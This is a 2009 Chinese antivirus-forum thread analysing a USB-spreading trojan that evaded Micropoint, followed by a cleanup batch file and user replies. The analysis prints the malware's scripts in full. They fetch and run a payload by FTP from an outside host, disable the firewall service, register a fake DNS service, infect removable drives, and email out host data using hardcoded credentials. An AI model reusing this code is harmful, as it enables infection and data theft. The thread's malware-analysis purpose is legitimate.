微点交流论坛

标题: 【已封】ChiChou517826104 过主防样本分析 [打印本页]

作者: 点饭的百度空间 时间: 2009-5-3 22:09 标题: 【已封】ChiChou517826104 过主防样本分析

2009年05月03日星期日 18:26
过微点样本down.exe（Trojan.Win32.IAgent）的分析。

帮同学修复U盘的时候拿到的。
一个猥琐的木马，使用了大量的脚本、批处理、计划任务等手段，终于逃过了Micropoint的监控……
非常猥琐~

下面是分析~

Trojan/Win32.IAgent

病毒使用vb6编写~ ASPack加壳。

原始工程名~
D盘感染(2.22确定).vbp

源码应该放在作者电脑的E盘~~~哈哈~

作者的VB安装目录
X:\Program Files\Microsoft Visual Studio\VB98

作者Q号~~ (sunhopp@tom.com)

使用at命令创建大量计划任务，命令行为
cmd /c cmd<C:\windows\system32\attusb.dll

在system32目录下创建

%systsmroot%\system32\attusb.dll ;一个辅助感染的批处理
%systsmroot%\system32\down.exe ;木马的副本

attusb.dll内容是一个批处理文件。代码如下：

Tasklist/SVC |find /i "Systen.exe" && taskkill /f /im cmd.exe
^c^o^p^y ^C^:^\^W^I^N^D^O^W^S^\^s^y^s^t^e^m^3^2^\^c^m^d^.^e^x^e ^C^:^\^W^I^N^D^O^W^S^\^s^y^s^t^e^m^3^2^\^S^y^s^t^e^n^.^e^x^e /y
^c^o^p^y ^C^:^\^W^I^N^D^O^W^S^\^s^y^s^t^e^m^3^2^\^p^i^n^g^.^e^x^e ^C^:^\^W^I^N^D^O^W^S^\^s^y^s^t^e^m^3^2^\^E^X^P^L^0^R^E^R^.^E^X^E /y
Systen /c %SystemRoot%\system32\autousb.bat

在计划任务里面使用 cmd /c<C:\windows\system32\attusb.dll 命令行来运行这个批处理。
使用“^“逃避路径检测。cmd执行的是这样的代码

Tasklist/SVC |find /i "Systen.exe" && taskkill /f /im cmd.exe
;查找 systen.exe 进程（cmd的副本）。同时关闭cmd.exe
copy C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\Systen.exe /y
;复制 cmd.exe，改名为 systen.exe
copy C:\WINDOWS\system32\ping.exe C:\WINDOWS\system32\EXPL0RER.EXE /y
;复制 ping.exe，改名为 explorer.exe
Systen /c %SystemRoot%\system32\autousb.bat
;使用systen.exe（实际为cmd.exe的副本）执行 %SystemRoot%\system32\autousb.bat

遍历D盘根目录下的所有文件夹，保存列表到
%SystemRoot%\system32\ok.txt

同时隐藏D盘所有文件夹，并建立同名的.exe副本诱惑用户点击

如果插入了U盘，将做同样的感染。

创建win.bat，内容如下。
功能是用来创建自启动项（不过我没有看到生成了什么文件）

@ dir %SystemRoot%\system32 |find "SuCH0ST.exe"
@ if %ERRORLEVEL%==0 goto ok
@ if %ERRORLEVEL%==1 goto end
:ok
@ net stop sharedaccess
sc stop sharedaccess
^c^o^p^y ^c^m^d^.^e^x^e ^S^V^C^H^0^S^.^e^x^e /y
@ cmd /c sc create DNSSystem binpath= "%systemroot%\system32\SVCH0S /c start SuCH0ST.exe " start= auto
@ cmd /c sc config DNSSystem displayname= "System DNS"
@ cmd /c sc config DNSSystem type= interact type= own
@ cmd /c sc description DNSSystem "(C) Microsoft Corporation 公司提供的(DNS)域名解析程序,如果该服务被停用，任何依赖它的服务将无法启动。"
@ sc start DNSSystem
%SystemRoot%\system32\SuCH0ST.exe
@ exit
:end
@ net stop sharedaccess
sc stop sharedaccess
del boot.exe /q
echo o autoqq.3322.org > 1.RMVB&echo 1234 >> 1.RMVB&echo 1234 >> 1.RMVB&echo get boot.exe boot.exe >> 1.RMVB&echo del down.exe >> 1.RMVB&echo bye >> 1.RMVB
ftp -s:1.RMVB
del 1.RMVB
ping 127.0.0.1 -n 3
cmd /c boot.exe
ping 127.0.0.1 -n 10
del %SystemRoot%\system32\boot.exe /q
echo o autoqq.3322.org > 2.RMVB&echo 4567 >> 2.RMVB&echo 4567 >> 2.RMVB&echo get boot.exe boot.exe >> 2.RMVB&echo del down.exe >> 2.RMVB&echo bye >> 2.RMVB
ftp -s:2.RMVB
del 2.RMVB
exit

创建autousb.bat，用来写入autorun

setlocal EnableDelayedExpansion
:1
fsutil fsinfo drives >%SystemRoot%\system32\output.txt
find ":\" < %SystemRoot%\system32\output.txt >%SystemRoot%\system32\out.txt
del %SystemRoot%\system32\output.txt /q
for /f %%i in (%SystemRoot%\system32\out.txt) do (
fsutil fsinfo drivetype %%i|find "可移动驱动器" &&echo %%i>>%SystemRoot%\system32\output.txt
)
if not exist %SystemRoot%\system32\output.txt goto 3
for /f %%r in (%SystemRoot%\system32\output.txt) do (
set var=%%r
cd /d !var!
dir /a:d-s /b > %SystemRoot%\system32\ok.txt
for /f "delims=" %%q in (%SystemRoot%\system32\ok.txt) do (
ATTRIB "%%q" +s +h & copy %SystemRoot%\system32\down.exe "!var!%%q.exe"
)
)
:3
EXPL0RER /n 10 127.0.1 &goto 1
;其实是调用ping延时 + 死循环

创建mail3.vbs，用来发送邮件（什么年代了。。。）
哈哈，这位大牛的Q号也在哈~

On Error Resume Next
mailto="294503954@qq.com" '路过~~~
Dim fso, f
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile("C:\WINDOWS\system32\mailbody.txt",1)
mailbody=f.ReadAll
f.Close
NameSpace = "http://schemas.microsoft.com/cdo/configuration/"
set Email = CreateObject("CDO.Message")
Email.From = "sunhopp@tom.com"
Email.To = mailto
Email.Subject = mailbody
Email.Textbody = mailbody
with Email.Configuration.Fields
.Item(NameSpace&"sendusing") = 2
.Item(NameSpace&"smtpserver") = "smtp.tom.com"
.Item(NameSpace&"smtpserverport") = 25
.Item(NameSpace&"smtpauthenticate") = 1
.Item(NameSpace&"sendusername") = "sunhopp"'这位同学的邮箱账户~~~
.Item(NameSpace&"sendpassword") = "autocad" '这位同学的邮箱密码~~~
.Update
end With
Email.Send
Wscript.quit

创建mailbody.txt。我只在里面看到了本机的IP。估计还有其他记录功能。

略过更多废话。

似乎样本在卡饭病毒区也有。看来这个东东已经存活很久了……

后续~

既然这位同学这么喜欢批处理，那我也整一个吧……

@echo off
del /f %systemroot%\Tasks\At*.job
del /f %systemroot%\system32\ok.txt
del /f %systemroot%\system32\down.exe
del /f %systemroot%\system32\attusb.dll,%systemroot%\system32\mail3.vbe
del /f %systemroot%\system32\autousb.bat,%systemroot%\system32\win.bat,%systemroot%\system32\dd.bat
taskkill /f /im explroer.exe
taskkill /f /im systen.exe
taskkill /f /im systen32.exe
del /f %systemroot%\system32\explroer.exe
del /f %systemroot%\system32\systen32.exe
del /f %systemroot%\system32\systen.exe
echo OK.
pause

[ Last edited by 点饭的百度空间 on 2010-6-4 at 00:35 ]

作者: 御剑临风. 时间: 2009-5-3 22:38
官方说了不防批处理啊。。。。。

微点说你还可以卸载微点。。你可以关机，你可以格式化硬盘

微点不会拦截的，他说是用户行为！

作者: snhao 时间: 2009-5-4 09:36
楼上的来了个180度大转弯啦。

作者: mamsds 时间: 2009-5-4 18:13
这个.........
微点确实要改！！！
不防不行！！！！

作者: 112112 时间: 2009-5-8 21:24
难道是有名的上M的文件夹病毒吗害的一堆人来找我修优盘说文件全被杀毒软件删了，。。。

作者: vestige 时间: 2009-5-9 11:33
就这病毒，丫的· 其他的不说，你光更改那些个文件夹属性都麻烦·

作者: cmdbxh 时间: 2009-5-13 21:16
呵呵，看起来蛮好。也说明微点需要改进。

作者: imeis 时间: 2009-6-17 03:52
=_=前2天就被这个东西给郁闷了一下，因为我的电脑默认显示文件名后缀和隐藏文件的，所以打开U盘一下子就看出来不对了，但是好奇点了一下，心想反正微软很强大，看看它能干嘛吧……于是微软把它杀掉了，但是我D盘里被变成隐藏的文件夹怎么都改不回来属性，只好又建新的丢进去，把隐藏的删掉……

作者: kn88 时间: 2009-6-17 09:08
这点微点做的不好，不过可以加个红伞啊

作者: zzjzzpgg12 时间: 2010-6-3 20:06
我也在一台机子上发现了这个东西。。微点现在好像她还没有反映，可能是没连外网吧。
不过我好奇的事他是怎么执行的啊？找到了个vbs，不幸被我删了。在attusb。dll，bat里没见有那个VBS啊~~

欢迎光临微点交流论坛 (http://bbs.micropoint.com.cn/)

bbs.micropoint.com.cn